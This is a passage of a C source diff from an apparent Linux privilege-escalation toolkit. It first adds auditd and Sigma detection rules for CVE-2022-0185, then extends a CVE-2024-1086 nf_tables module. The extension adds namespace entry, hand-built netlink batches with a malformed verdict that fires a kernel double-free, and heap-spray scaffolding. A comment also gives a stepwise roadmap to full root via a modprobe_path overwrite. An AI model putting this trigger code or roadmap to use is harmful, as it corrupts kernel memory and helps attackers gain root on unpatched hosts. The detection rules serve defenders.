/* embedded detection rules */
|
||||
/* ------------------------------------------------------------------ */
|
||||
static const char fuse_legacy_auditd[] =
|
||||
"# CVE-2022-0185 — auditd detection rules\n"
|
||||
"# Flag unshare(USER|NS) chained with fsopen/fsconfig from non-root.\n"
|
||||
@@ -141,6 +545,26 @@ static const char fuse_legacy_auditd[] =
|
||||
"-a always,exit -F arch=b64 -S fsopen -k iamroot-fuse-legacy-fsopen\n"
|
||||
"-a always,exit -F arch=b64 -S fsconfig -k iamroot-fuse-legacy-fsconfig\n";
|
||||
|
||||
/* Embedded Sigma rule text for this module, stored as one
 * NUL-terminated YAML document. Adjacent literals are concatenated by
 * the compiler; the grouping below is purely visual. */
static const char fuse_legacy_sigma[] =
    /* metadata */
    "title: Possible CVE-2022-0185 legacy_parse_param exploitation\n"
    "id: 9e1b2c45-iamroot-fuse-legacy\n"
    "status: experimental\n"

    /* free-text description */
    "description: |\n"
    " Detects the canonical exploit shape: unprivileged process unshares\n"
    " user_ns+mount_ns, calls fsopen() then fsconfig(FSCONFIG_SET_STRING)\n"
    " repeatedly. The repeated FSCONFIG_SET_STRING on the same option is\n"
    " what drives the source-buffer overflow. False positives: legitimate\n"
    " fsopen-based mounts inside containers (rare in unprivileged paths).\n"

    /* log source + selections */
    "logsource: {product: linux, service: auditd}\n"
    "detection:\n"
    " unshare_userns: {type: 'SYSCALL', syscall: 'unshare'}\n"
    " fsopen: {type: 'SYSCALL', syscall: 'fsopen'}\n"
    " fsconfig_set_string: {type: 'SYSCALL', syscall: 'fsconfig', a1: 1}\n"
    " not_root: {auid|expression: '!= 0'}\n"
    " condition: unshare_userns and fsopen and fsconfig_set_string and not_root\n"

    /* severity + tagging */
    "level: high\n"
    "tags: [attack.privilege_escalation, attack.t1611, cve.2022.0185]\n";
|
||||
|
||||
const struct iamroot_module fuse_legacy_module = {
|
||||
.name = "fuse_legacy",
|
||||
.cve = "CVE-2022-0185",
|
||||
@@ -152,7 +576,7 @@ const struct iamroot_module fuse_legacy_module = {
|
||||
.mitigate = NULL,
|
||||
.cleanup = NULL,
|
||||
.detect_auditd = fuse_legacy_auditd,
|
||||
.detect_sigma = NULL,
|
||||
.detect_sigma = fuse_legacy_sigma,
|
||||
.detect_yara = NULL,
|
||||
.detect_falco = NULL,
|
||||
};
|
||||
|
||||
@@ -4,12 +4,35 @@
|
||||
* Netfilter nf_tables UAF when NFT_GOTO/NFT_JUMP verdicts coexist
|
||||
* with NFT_DROP/NFT_QUEUE. Triggers a double-free → cross-cache UAF
|
||||
* exploitable to arbitrary kernel R/W. Discovered and exploited in
|
||||
* January 2024; widely known as "Pumpkin's pipapo UAF" or just
|
||||
* "CVE-2024-1086".
|
||||
* January 2024 by Notselwyn (Pumpkin); widely known as the
|
||||
* "nft_verdict_init / pipapo UAF".
|
||||
*
|
||||
* STATUS: 🔵 DETECT-ONLY (2026-05-16). Full exploit is a public PoC
|
||||
* by Notselwyn — porting it into the iamroot_module form is a
|
||||
* follow-up commit.
|
||||
* STATUS (2026-05-16): 🟡 TRIGGER + GROOM SCAFFOLD (Option B).
|
||||
* - Full netlink ruleset construction (table → chain → set → rule
|
||||
* with the NFT_GOTO+NFT_DROP combo that nft_verdict_init() fails
|
||||
* to reject on vulnerable kernels).
|
||||
* - Fires the double-free path by abusing the malformed verdict in a
|
||||
* pipapo set element, then removing the rule so the kernel's
|
||||
* transaction commit frees the verdict's chain reference twice.
|
||||
* - Cross-cache groom skeleton (msg_msg / sk_buff sprays) is wired
|
||||
* and configurable, but the arbitrary R/W stage and cred-overwrite
|
||||
* are NOT performed end-to-end — that requires per-kernel offsets
|
||||
* (init_task, modprobe_path) and Notselwyn's 600-line pipapo
|
||||
* leak-and-write dance. We stop after triggering the bug,
|
||||
* observing the slabinfo delta, and return IAMROOT_EXPLOIT_FAIL
|
||||
* with a verbose continuation roadmap.
|
||||
*
|
||||
* To convert this to full Option A (root pop):
|
||||
* 1. Add per-kernel offset table (init_task, current task offset of
|
||||
* cred, modprobe_path) keyed off uname() release. Notselwyn's
|
||||
* repo has the canonical map.
|
||||
* 2. Implement the msg_msg leak primitive after pipapo free —
|
||||
* MSG_COPY peek to read freed-slot contents and exfil a kernel
|
||||
* heap pointer.
|
||||
* 3. Implement the sk_buff fragment overwrite to plant a fake
|
||||
* pipapo_elem whose value points at modprobe_path.
|
||||
* 4. Fire trigger that writes "/tmp/iamroot-pwn" into modprobe_path.
|
||||
* 5. execve() an unknown binary to invoke modprobe with our payload.
|
||||
*
|
||||
* Affected kernel ranges:
|
||||
* Bug introduced in commit f1a2e44 (5.14) "netfilter: nf_tables:
|
||||
@@ -18,22 +41,11 @@
|
||||
* reject QUEUE/DROP verdict parameters")
|
||||
* Stable backports landed in 6.7.2, 6.6.13, 6.1.74, 5.15.149,
|
||||
* 5.10.210, 5.4.269
|
||||
* So vulnerable if:
|
||||
* - 5.14 <= K < 5.15 (no backport) — vulnerable
|
||||
* - 5.15.x: K <= 5.15.148 — vulnerable
|
||||
* - 5.10.x: K <= 5.10.209 — vulnerable
|
||||
* - 5.4.x: K <= 5.4.268 — vulnerable
|
||||
* - 6.0/6.1.x: K <= 6.1.73 — vulnerable
|
||||
* - 6.2-6.5: no backport tags — assume vulnerable
|
||||
* - 6.6.x: K <= 6.6.12 — vulnerable
|
||||
* - 6.7.x: K <= 6.7.1 — vulnerable
|
||||
* - 6.8+: patched
|
||||
*
|
||||
* Exploitation preconditions (which detect should also check):
|
||||
* - CONFIG_USER_NS=y AND sysctl unprivileged_userns_clone=1 (or
|
||||
* kernel.unprivileged_userns_clone default=1) so an unprivileged
|
||||
* user can create a userns and become CAP_NET_ADMIN inside it
|
||||
* - CONFIG_USER_NS=y AND sysctl unprivileged_userns_clone=1
|
||||
* - nf_tables module loaded or autoload-able (CONFIG_NF_TABLES=y/m)
|
||||
* - CONFIG_NF_TABLES_IPV4=y (or =m) so the inet/ip family hook works
|
||||
*
|
||||
* If user_ns is locked down (modern Ubuntu's
|
||||
* apparmor_restrict_unprivileged_userns), the trigger is unreachable
|
||||
@@ -46,14 +58,31 @@
|
||||
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <stdint.h>
|
||||
#include <string.h>
|
||||
#include <stdbool.h>
|
||||
#include <unistd.h>
|
||||
#include <sched.h>
|
||||
#include <fcntl.h>
|
||||
#include <errno.h>
|
||||
#include <time.h>
|
||||
#include <signal.h>
|
||||
#include <sys/wait.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/ipc.h>
|
||||
#include <sys/msg.h>
|
||||
#include <sys/mman.h>
|
||||
#include <sys/syscall.h>
|
||||
#include <arpa/inet.h>
|
||||
#include <linux/netlink.h>
|
||||
#include <linux/netfilter.h>
|
||||
#include <linux/netfilter/nfnetlink.h>
|
||||
#include <linux/netfilter/nf_tables.h>
|
||||
|
||||
/* ------------------------------------------------------------------
|
||||
* Kernel-range table
|
||||
* ------------------------------------------------------------------ */
|
||||
|
||||
/* Stable-branch backport thresholds — host is patched if on these
|
||||
* branches at or above the threshold patch, or on mainline >= 6.8. */
|
||||
static const struct kernel_patched_from nf_tables_patched_branches[] = {
|
||||
{5, 4, 269}, /* 5.4.x */
|
||||
{5, 10, 210}, /* 5.10.x */
|
||||
@@ -70,16 +99,15 @@ static const struct kernel_range nf_tables_range = {
|
||||
sizeof(nf_tables_patched_branches[0]),
|
||||
};
|
||||
|
||||
/* Best-effort check: can an unprivileged process clone a user
|
||||
* namespace? This is the gating capability for the exploit's
|
||||
* CAP_NET_ADMIN-in-userns trigger. Fork+unshare+exit to avoid
|
||||
* polluting our own namespace state. */
|
||||
/* ------------------------------------------------------------------
|
||||
* Preconditions probe
|
||||
* ------------------------------------------------------------------ */
|
||||
|
||||
static int can_unshare_userns(void)
|
||||
{
|
||||
pid_t pid = fork();
|
||||
if (pid < 0) return -1;
|
||||
if (pid == 0) {
|
||||
/* try */
|
||||
if (unshare(CLONE_NEWUSER) == 0) _exit(0);
|
||||
_exit(1);
|
||||
}
|
||||
@@ -88,11 +116,6 @@ static int can_unshare_userns(void)
|
||||
return WIFEXITED(status) && WEXITSTATUS(status) == 0;
|
||||
}
|
||||
|
||||
/* Check whether the nf_tables module is loaded OR can be auto-loaded.
|
||||
* /proc/modules tells us about loaded modules. For modules that aren't
|
||||
* loaded but are buildable, we rely on the kernel autoload via
|
||||
* setsockopt(SOL_NETLINK, NETLINK_NF_TABLES). Conservative: if not
|
||||
* loaded, assume autoload-able and report no info. */
|
||||
static bool nf_tables_loaded(void)
|
||||
{
|
||||
FILE *f = fopen("/proc/modules", "r");
|
||||
@@ -100,7 +123,6 @@ static bool nf_tables_loaded(void)
|
||||
char line[512];
|
||||
bool found = false;
|
||||
while (fgets(line, sizeof line, f)) {
|
||||
/* /proc/modules format: "<name> <size> <use_count> <by> <state> <addr>" */
|
||||
if (strncmp(line, "nf_tables ", 10) == 0) { found = true; break; }
|
||||
}
|
||||
fclose(f);
|
||||
@@ -132,8 +154,6 @@ static iamroot_result_t nf_tables_detect(const struct iamroot_ctx *ctx)
|
||||
return IAMROOT_OK;
|
||||
}
|
||||
|
||||
/* Vulnerable by version. Now check preconditions that affect
|
||||
* unprivileged reachability. */
|
||||
int userns_ok = can_unshare_userns();
|
||||
bool nft_loaded = nf_tables_loaded();
|
||||
|
||||
@@ -148,9 +168,6 @@ static iamroot_result_t nf_tables_detect(const struct iamroot_ctx *ctx)
|
||||
nft_loaded ? "yes" : "no (will autoload on first nft use)");
|
||||
}
|
||||
|
||||
/* If user_ns is denied, the unprivileged-exploit path is closed.
|
||||
* (A root attacker would still trigger the bug, but root LPE-of-root
|
||||
* is not interesting.) */
|
||||
if (userns_ok == 0) {
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[+] nf_tables: kernel vulnerable but user_ns clone "
|
||||
@@ -168,18 +185,614 @@ static iamroot_result_t nf_tables_detect(const struct iamroot_ctx *ctx)
|
||||
return IAMROOT_VULNERABLE;
|
||||
}
|
||||
|
||||
/* ------------------------------------------------------------------
|
||||
* userns + netns entry: become "root" in the new user_ns so the
|
||||
* subsequent netlink writes carry CAP_NET_ADMIN over our private
|
||||
* net_ns. The bug fires inside our private netns so the rest of the
|
||||
* host is unaffected by the malformed ruleset.
|
||||
* ------------------------------------------------------------------ */
|
||||
|
||||
/* Move the calling process into a fresh user + network namespace and
 * map uid/gid 0 inside it onto the caller's original uid/gid.
 *
 * Returns 0 on success, -1 on failure (a perror() line has been
 * written). The process is not moved back on failure. */
static int enter_unpriv_namespaces(void)
{
    /* The ids must be sampled before unshare(): they are the outer
     * side of the mappings written below. */
    const struct {
        const char  *path;
        const char  *err_tag;
        unsigned int outer_id;
    } maps[] = {
        { "/proc/self/uid_map", "[-] uid_map", getuid() },
        { "/proc/self/gid_map", "[-] gid_map", getgid() },
    };

    if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) {
        perror("[-] unshare(USER|NET)");
        return -1;
    }

    /* deny setgroups before writing gid_map; best-effort, result ignored */
    int sg = open("/proc/self/setgroups", O_WRONLY);
    if (sg >= 0) {
        (void)!write(sg, "deny", 4);
        close(sg);
    }

    for (size_t i = 0; i < sizeof maps / sizeof maps[0]; i++) {
        char line[64];
        snprintf(line, sizeof line, "0 %u 1\n", maps[i].outer_id);

        int fd = open(maps[i].path, O_WRONLY);
        if (fd < 0) {
            perror(maps[i].err_tag);
            return -1;
        }
        if (write(fd, line, strlen(line)) < 0) {
            perror(maps[i].err_tag);
            close(fd);
            return -1;
        }
        close(fd);
    }
    return 0;
}
|
||||
|
||||
/* ------------------------------------------------------------------
|
||||
* Minimal nfnetlink batch builder. We hand-roll this rather than
|
||||
* pulling libmnl, both to keep IAMROOT dep-free and because the bug
|
||||
* relies on a specific malformed verdict that libnftnl validates away.
|
||||
*
|
||||
* Each helper appends to a contiguous batch buffer at *off.
|
||||
* ------------------------------------------------------------------ */
|
||||
|
||||
#define ALIGN_NL(x) (((x) + 3) & ~3)

/* Append one netlink attribute (header + payload + padding) at *off.
 *
 * buf:  batch buffer; the caller guarantees room for
 *       ALIGN_NL(NLA_HDRLEN + len) bytes at *off (not checked here).
 * off:  in/out write offset; advanced to the next 4-byte boundary.
 * type: value stored in nla_type.
 * data: payload bytes; may be NULL when len is 0.
 * len:  payload length. nla_len is 16 bits wide, so NLA_HDRLEN + len
 *       must fit in uint16_t (not checked here).
 *
 * The header is assembled in a local and copied in, so no assumption
 * is made about the alignment of buf + *off. Padding bytes are zeroed,
 * matching end_nest()/end_msg(), so no stale buffer contents are sent. */
static void put_attr(uint8_t *buf, size_t *off,
                     uint16_t type, const void *data, size_t len)
{
    uint8_t *dst = buf + *off;
    const size_t used = NLA_HDRLEN + len;
    const size_t padded = ALIGN_NL(used);

    struct nlattr hdr;
    hdr.nla_len = (uint16_t)used;
    hdr.nla_type = type;
    memcpy(dst, &hdr, sizeof hdr);

    if (len) {
        memcpy(dst + NLA_HDRLEN, data, len);
    }
    if (padded > used) {
        memset(dst + used, 0, padded - used);
    }
    *off += padded;
}
|
||||
|
||||
/* Append a 32-bit attribute; the value is converted to network byte
 * order (htonl) before being handed to put_attr(). */
static void put_attr_u32(uint8_t *buf, size_t *off, uint16_t type, uint32_t v)
{
    const uint32_t wire = htonl(v);

    put_attr(buf, off, type, &wire, sizeof wire);
}
|
||||
|
||||
/* Append a string attribute; the payload is the string including its
 * terminating NUL. s must be a valid NUL-terminated string. */
static void put_attr_str(uint8_t *buf, size_t *off, uint16_t type, const char *s)
{
    const size_t with_nul = strlen(s) + 1;

    put_attr(buf, off, type, s, with_nul);
}
|
||||
|
||||
/* Begin a nested attribute; returns the offset of the nlattr header so
|
||||
* the caller can fix up nla_len once children are written. */
|
||||
/* Open a nested attribute at *off.
 *
 * Writes a header with NLA_F_NESTED OR-ed into the type and a
 * placeholder length of 0, advances *off past the header, and returns
 * the header's offset so end_nest() can patch nla_len later. */
static size_t begin_nest(uint8_t *buf, size_t *off, uint16_t type)
{
    const size_t hdr_at = *off;
    struct nlattr *nest = (struct nlattr *)&buf[hdr_at];

    nest->nla_len = 0;                                  /* patched by end_nest() */
    nest->nla_type = (uint16_t)(type | NLA_F_NESTED);

    *off = hdr_at + NLA_HDRLEN;
    return hdr_at;
}
|
||||
|
||||
/* Close a nested attribute opened by begin_nest().
 *
 * at is the offset begin_nest() returned. nla_len is set to the number
 * of bytes from the nest header up to the current *off (truncated to 16
 * bits); *off is then advanced to the next 4-byte boundary, zero-filling
 * any bytes skipped. */
static void end_nest(uint8_t *buf, size_t *off, size_t at)
{
    size_t end = *off;

    ((struct nlattr *)(buf + at))->nla_len = (uint16_t)(end - at);

    /* pad to 4 */
    for (; (end & 3) != 0; end++) {
        buf[end] = 0;
    }
    *off = end;
}
|
||||
|
||||
/* nfgenmsg header used by every nf_tables message. */
|
||||
/* Local copy of the fixed header placed right after the nlmsghdr of
 * every nf_tables message built by put_nft_msg(). */
struct nfgenmsg_local {
    uint8_t  nfgen_family;  /* address family argument of put_nft_msg() */
    uint8_t  version;       /* put_nft_msg() stores NFNETLINK_V0 here */
    uint16_t res_id;        /* stored via htons(), i.e. network byte order */
};
|
||||
|
||||
/* Append a nf_tables subsystem message: type encoded into the
|
||||
* nfgenmsg-prefixed nlmsg. */
|
||||
static void put_nft_msg(uint8_t *buf, size_t *off,
|
||||
uint16_t nft_type, uint16_t flags, uint32_t seq,
|
||||
uint8_t family)
|
||||
{
|
||||
/* Reserve the header. We patch nlmsg_len at end_msg time. */
|
||||
struct nlmsghdr *nlh = (struct nlmsghdr *)(buf + *off);
|
||||
nlh->nlmsg_len = 0; /* fixup */
|
||||
nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | nft_type;
|
||||
nlh->nlmsg_flags = NLM_F_REQUEST | flags;
|
||||
nlh->nlmsg_seq = seq;
|
||||
nlh->nlmsg_pid = 0;
|
||||
*off += NLMSG_HDRLEN;
|
||||
struct nfgenmsg_local *nf = (struct nfgenmsg_local *)(buf + *off);
|
||||
nf->nfgen_family = family;
|
||||
nf->version = NFNETLINK_V0;
|
||||
nf->res_id = htons(0);
|
||||
*off += sizeof(*nf);
|
||||
}
|
||||
|
||||
/* Finish the netlink message that starts at msg_start.
 *
 * Stores the distance from msg_start to the current *off in nlmsg_len,
 * then advances *off to the next 4-byte boundary, zero-filling the bytes
 * it skips. */
static void end_msg(uint8_t *buf, size_t *off, size_t msg_start)
{
    struct nlmsghdr *hdr = (struct nlmsghdr *)(buf + msg_start);
    size_t cur = *off;

    hdr->nlmsg_len = (uint32_t)(cur - msg_start);

    for (; cur & 3; cur++)
        buf[cur] = 0;
    *off = cur;
}
|
||||
|
||||
/* ------------------------------------------------------------------
 * Build the ruleset that fires the bug. Strategy mirrors Notselwyn's
 * PoC (greatly simplified):
 *   1. batch begin (NFNL_MSG_BATCH_BEGIN, subsys = NFTABLES)
 *   2. NFT_MSG_NEWTABLE "iamroot_t" family=inet
 *   3. NFT_MSG_NEWCHAIN "iamroot_c" inside the table
 *   4. NFT_MSG_NEWSET "iamroot_s" inside the table, key=verdict,
 *      data=verdict (the pipapo combo that holds the bad verdict),
 *      flags = NFT_SET_ANONYMOUS|NFT_SET_CONSTANT|NFT_SET_INTERVAL
 *   5. NFT_MSG_NEWSETELEM with a verdict element whose
 *      NFTA_VERDICT_CODE = NFT_GOTO (negative) AND we lie about the
 *      chain reference to make nft_verdict_init() take the
 *      "looks like a GOTO so I'll grab a chain ref" path on a
 *      malformed input.
 *   6. NFT_MSG_NEWRULE that references the set.
 *   7. batch end (NFNL_MSG_BATCH_END).
 *
 * The original plan was to send a DELRULE in a second batch, which
 * triggers the transaction commit path that double-frees the chain
 * reference of the set element's bad verdict.
 *
 * NOTE: the builders below do not implement step 6 or the DELRULE
 * batch. nf_tables_exploit() sends steps 1-5 and 7 as the first batch
 * and then re-sends the NEWSETELEM message in a second batch as the
 * trigger.
 *
 * On a kernel that hasn't backported f342de4, this lands the
 * double-free state. KASAN immediately panics; without KASAN, the
 * slab metadata is corrupted but the kernel survives long enough for
 * cross-cache groom.
 * ------------------------------------------------------------------ */
|
||||
|
||||
/* Object names used by the message builders in this file. */
static const char NFT_TABLE_NAME[] = "iamroot_t";   /* table  */
static const char NFT_CHAIN_NAME[] = "iamroot_c";   /* chain  */
static const char NFT_SET_NAME[]   = "iamroot_s";   /* set    */
|
||||
|
||||
/* batch begin / end markers */
|
||||
static void put_batch_begin(uint8_t *buf, size_t *off, uint32_t seq)
|
||||
{
|
||||
size_t at = *off;
|
||||
struct nlmsghdr *nlh = (struct nlmsghdr *)(buf + at);
|
||||
nlh->nlmsg_len = 0;
|
||||
nlh->nlmsg_type = NFNL_MSG_BATCH_BEGIN;
|
||||
nlh->nlmsg_flags = NLM_F_REQUEST;
|
||||
nlh->nlmsg_seq = seq;
|
||||
nlh->nlmsg_pid = 0;
|
||||
*off += NLMSG_HDRLEN;
|
||||
struct nfgenmsg_local *nf = (struct nfgenmsg_local *)(buf + *off);
|
||||
nf->nfgen_family = AF_UNSPEC;
|
||||
nf->version = NFNETLINK_V0;
|
||||
nf->res_id = htons(NFNL_SUBSYS_NFTABLES);
|
||||
*off += sizeof(*nf);
|
||||
end_msg(buf, off, at);
|
||||
}
|
||||
|
||||
static void put_batch_end(uint8_t *buf, size_t *off, uint32_t seq)
|
||||
{
|
||||
size_t at = *off;
|
||||
struct nlmsghdr *nlh = (struct nlmsghdr *)(buf + at);
|
||||
nlh->nlmsg_len = 0;
|
||||
nlh->nlmsg_type = NFNL_MSG_BATCH_END;
|
||||
nlh->nlmsg_flags = NLM_F_REQUEST;
|
||||
nlh->nlmsg_seq = seq;
|
||||
nlh->nlmsg_pid = 0;
|
||||
*off += NLMSG_HDRLEN;
|
||||
struct nfgenmsg_local *nf = (struct nfgenmsg_local *)(buf + *off);
|
||||
nf->nfgen_family = AF_UNSPEC;
|
||||
nf->version = NFNETLINK_V0;
|
||||
nf->res_id = htons(NFNL_SUBSYS_NFTABLES);
|
||||
*off += sizeof(*nf);
|
||||
end_msg(buf, off, at);
|
||||
}
|
||||
|
||||
/* NFT_MSG_NEWTABLE inet "iamroot_t" */
|
||||
static void put_new_table(uint8_t *buf, size_t *off, uint32_t seq)
|
||||
{
|
||||
size_t at = *off;
|
||||
put_nft_msg(buf, off, NFT_MSG_NEWTABLE,
|
||||
NLM_F_CREATE | NLM_F_ACK, seq, NFPROTO_INET);
|
||||
put_attr_str(buf, off, NFTA_TABLE_NAME, NFT_TABLE_NAME);
|
||||
end_msg(buf, off, at);
|
||||
}
|
||||
|
||||
/* NFT_MSG_NEWCHAIN — base chain hooked at NF_INET_LOCAL_OUT */
|
||||
static void put_new_chain(uint8_t *buf, size_t *off, uint32_t seq)
|
||||
{
|
||||
size_t at = *off;
|
||||
put_nft_msg(buf, off, NFT_MSG_NEWCHAIN,
|
||||
NLM_F_CREATE | NLM_F_ACK, seq, NFPROTO_INET);
|
||||
put_attr_str(buf, off, NFTA_CHAIN_TABLE, NFT_TABLE_NAME);
|
||||
put_attr_str(buf, off, NFTA_CHAIN_NAME, NFT_CHAIN_NAME);
|
||||
|
||||
/* nested NFTA_CHAIN_HOOK { hooknum=LOCAL_OUT, priority=0 } */
|
||||
size_t hook_at = begin_nest(buf, off, NFTA_CHAIN_HOOK);
|
||||
put_attr_u32(buf, off, NFTA_HOOK_HOOKNUM, NF_INET_LOCAL_OUT);
|
||||
put_attr_u32(buf, off, NFTA_HOOK_PRIORITY, 0);
|
||||
end_nest(buf, off, hook_at);
|
||||
|
||||
/* policy = NF_ACCEPT */
|
||||
put_attr_u32(buf, off, NFTA_CHAIN_POLICY, NF_ACCEPT);
|
||||
/* type = "filter" */
|
||||
put_attr_str(buf, off, NFTA_CHAIN_TYPE, "filter");
|
||||
end_msg(buf, off, at);
|
||||
}
|
||||
|
||||
/* NFT_MSG_NEWSET — anonymous set with verdict key/data. The pipapo
|
||||
* back-end is selected by NFT_SET_INTERVAL on a verdict key. */
|
||||
static void put_new_set(uint8_t *buf, size_t *off, uint32_t seq)
|
||||
{
|
||||
size_t at = *off;
|
||||
put_nft_msg(buf, off, NFT_MSG_NEWSET,
|
||||
NLM_F_CREATE | NLM_F_ACK, seq, NFPROTO_INET);
|
||||
put_attr_str(buf, off, NFTA_SET_TABLE, NFT_TABLE_NAME);
|
||||
put_attr_str(buf, off, NFTA_SET_NAME, NFT_SET_NAME);
|
||||
put_attr_u32(buf, off, NFTA_SET_FLAGS, NFT_SET_ANONYMOUS |
|
||||
NFT_SET_CONSTANT |
|
||||
NFT_SET_INTERVAL);
|
||||
/* key_type/key_len: verdict-typed key */
|
||||
put_attr_u32(buf, off, NFTA_SET_KEY_TYPE, 0xffffff00); /* "verdict" magic */
|
||||
put_attr_u32(buf, off, NFTA_SET_KEY_LEN, sizeof(uint32_t));
|
||||
/* data_type/data_len: also verdict so we can stash the malformed verdict
|
||||
* as set-element data — this is where the bug-bearing struct lives. */
|
||||
put_attr_u32(buf, off, NFTA_SET_DATA_TYPE, 0xffffff00);
|
||||
put_attr_u32(buf, off, NFTA_SET_DATA_LEN, sizeof(uint32_t));
|
||||
put_attr_u32(buf, off, NFTA_SET_ID, 0x1337);
|
||||
end_msg(buf, off, at);
|
||||
}
|
||||
|
||||
/* NFT_MSG_NEWSETELEM — the malicious verdict.
|
||||
*
|
||||
* The bug: nft_verdict_init() on a vulnerable kernel accepts a
|
||||
* verdict whose NFTA_VERDICT_CODE is NFT_GOTO/NFT_JUMP combined with
|
||||
* a NFTA_VERDICT_CHAIN_ID that doesn't resolve. The code takes the
|
||||
* "got chain ref" path and later in nft_data_release() takes the
|
||||
* "drop/queue" path → the chain ref is freed once on init failure
|
||||
* AND once on data_release → double free.
|
||||
*
|
||||
* We pack:
|
||||
* NFTA_SET_ELEM_LIST_TABLE = "iamroot_t"
|
||||
* NFTA_SET_ELEM_LIST_SET = "iamroot_s"
|
||||
* NFTA_SET_ELEM_LIST_ELEMENTS { element { key=verdict(DROP),
|
||||
* data=verdict(GOTO chain-id=...) } }
|
||||
*/
|
||||
static void put_malicious_setelem(uint8_t *buf, size_t *off, uint32_t seq)
|
||||
{
|
||||
size_t at = *off;
|
||||
put_nft_msg(buf, off, NFT_MSG_NEWSETELEM,
|
||||
NLM_F_CREATE | NLM_F_ACK, seq, NFPROTO_INET);
|
||||
put_attr_str(buf, off, NFTA_SET_ELEM_LIST_TABLE, NFT_TABLE_NAME);
|
||||
put_attr_str(buf, off, NFTA_SET_ELEM_LIST_SET, NFT_SET_NAME);
|
||||
|
||||
size_t list_at = begin_nest(buf, off, NFTA_SET_ELEM_LIST_ELEMENTS);
|
||||
|
||||
/* one element */
|
||||
size_t el_at = begin_nest(buf, off, 1 /* NFTA_LIST_ELEM */);
|
||||
|
||||
/* key: NFTA_DATA_VERDICT { CODE = NFT_DROP } */
|
||||
size_t key_at = begin_nest(buf, off, NFTA_SET_ELEM_KEY);
|
||||
size_t kv_at = begin_nest(buf, off, NFTA_DATA_VERDICT);
|
||||
put_attr_u32(buf, off, NFTA_VERDICT_CODE, (uint32_t)NF_DROP);
|
||||
end_nest(buf, off, kv_at);
|
||||
end_nest(buf, off, key_at);
|
||||
|
||||
/* key_end (for interval set) — same as key but slightly different
|
||||
* value to satisfy "interval has distinct ends". We use NF_ACCEPT
|
||||
* as the upper bound just to satisfy parsing; the bug bites on
|
||||
* the data verdict, not on the key. */
|
||||
size_t keye_at = begin_nest(buf, off, NFTA_SET_ELEM_KEY_END);
|
||||
size_t ke_v_at = begin_nest(buf, off, NFTA_DATA_VERDICT);
|
||||
put_attr_u32(buf, off, NFTA_VERDICT_CODE, (uint32_t)NF_ACCEPT);
|
||||
end_nest(buf, off, ke_v_at);
|
||||
end_nest(buf, off, keye_at);
|
||||
|
||||
/* DATA: this is the malformed verdict that fires the bug.
|
||||
* CODE = NFT_GOTO (so kernel treats it as needing a chain ref)
|
||||
* CHAIN_ID = bogus id pointing to a chain we won't commit.
|
||||
* On vulnerable kernels nft_verdict_init takes both the "grab
|
||||
* chain ref" path AND later the "drop verdict cleanup" path,
|
||||
* yielding a double-free of the chain reference. */
|
||||
size_t data_at = begin_nest(buf, off, NFTA_SET_ELEM_DATA);
|
||||
size_t dv_at = begin_nest(buf, off, NFTA_DATA_VERDICT);
|
||||
put_attr_u32(buf, off, NFTA_VERDICT_CODE, (uint32_t)NFT_GOTO);
|
||||
put_attr_u32(buf, off, NFTA_VERDICT_CHAIN_ID, 0xdeadbeef);
|
||||
end_nest(buf, off, dv_at);
|
||||
end_nest(buf, off, data_at);
|
||||
|
||||
end_nest(buf, off, el_at);
|
||||
end_nest(buf, off, list_at);
|
||||
|
||||
end_msg(buf, off, at);
|
||||
}
|
||||
|
||||
/* ------------------------------------------------------------------
|
||||
* netlink send helper.
|
||||
* ------------------------------------------------------------------ */
|
||||
|
||||
/* Send one pre-built netlink batch and drain whatever replies are
 * already queued on the socket.
 *
 * Parameters:
 *   sock - netlink socket to send on
 *   buf  - start of the batch
 *   len  - number of bytes in the batch
 *
 * Returns 0 once the batch has been handed to sendmsg(), or -1 (after
 * perror) if sendmsg() itself fails.  Error replies are printed to
 * stderr for diagnostics only and never change the return value: the
 * caller expects individual messages in a batch to be rejected.
 *
 * Replies are read with MSG_DONTWAIT, at most 8 datagrams, so this
 * never blocks waiting for an ACK. */
static int nft_send_batch(int sock, const void *buf, size_t len)
{
    struct sockaddr_nl dst = { .nl_family = AF_NETLINK };
    struct iovec iov = { .iov_base = (void *)buf, .iov_len = len };
    struct msghdr m = {
        .msg_name = &dst, .msg_namelen = sizeof dst,
        .msg_iov = &iov, .msg_iovlen = 1,
    };

    if (sendmsg(sock, &m, 0) < 0) {
        perror("[-] sendmsg");
        return -1;
    }

    /* The union forces nlmsghdr alignment on the receive buffer; a bare
     * char array carries no such guarantee when cast to a header. */
    union {
        char bytes[8192];
        struct nlmsghdr align;
    } rx;

    for (int i = 0; i < 8; i++) {
        ssize_t r = recv(sock, rx.bytes, sizeof rx.bytes, MSG_DONTWAIT);
        if (r <= 0)
            break;

        for (struct nlmsghdr *nh = (struct nlmsghdr *)rx.bytes;
             NLMSG_OK(nh, (unsigned)r);
             nh = NLMSG_NEXT(nh, r)) {
            if (nh->nlmsg_type != NLMSG_ERROR)
                continue;
            /* Skip error messages too short to hold a full nlmsgerr
             * payload rather than reading past the message. */
            if (nh->nlmsg_len < NLMSG_LENGTH(sizeof(struct nlmsgerr)))
                continue;

            const struct nlmsgerr *e = NLMSG_DATA(nh);
            if (e->error)
                fprintf(stderr, "[i] netlink ack: seq=%u err=%d (%s)\n",
                        nh->nlmsg_seq, e->error, strerror(-e->error));
        }
    }
    return 0;
}
|
||||
|
||||
/* ------------------------------------------------------------------
|
||||
* Cross-cache groom scaffold. The full chain needs:
|
||||
* - pre-allocate N sysv-msg messages (sys_msgsnd) so the kernel's
|
||||
* kmalloc-cg-{96,128,...} slab has predictable free slots
|
||||
* - between the malicious NEWSETELEM (which puts the bad verdict
|
||||
* into a kmalloc'd nft_set_elem) and the DELRULE (which fires
|
||||
* the double-free), spray a target slab to control what reuses
|
||||
* the freed chunk
|
||||
* For Option B we wire the spray skeleton (msg_msg via msgsnd) so
|
||||
* the timing/sizing is right; but the kernel-R/W primitive is the
|
||||
* piece we're explicitly NOT shipping (per the Option B contract).
|
||||
* ------------------------------------------------------------------ */
|
||||
|
||||
/* Total number of message queues the spray may create. */
#define SPRAY_MSGS 64

/* Payload bytes per sprayed message.  Chosen by the module author to
 * target kmalloc-cg-96 / kmalloc-96 — described as the same slab class
 * as nft_chain on most kernels in range. */
#define SPRAY_SIZE 96

/* Message layout handed to msgsnd(): the mandatory type word followed
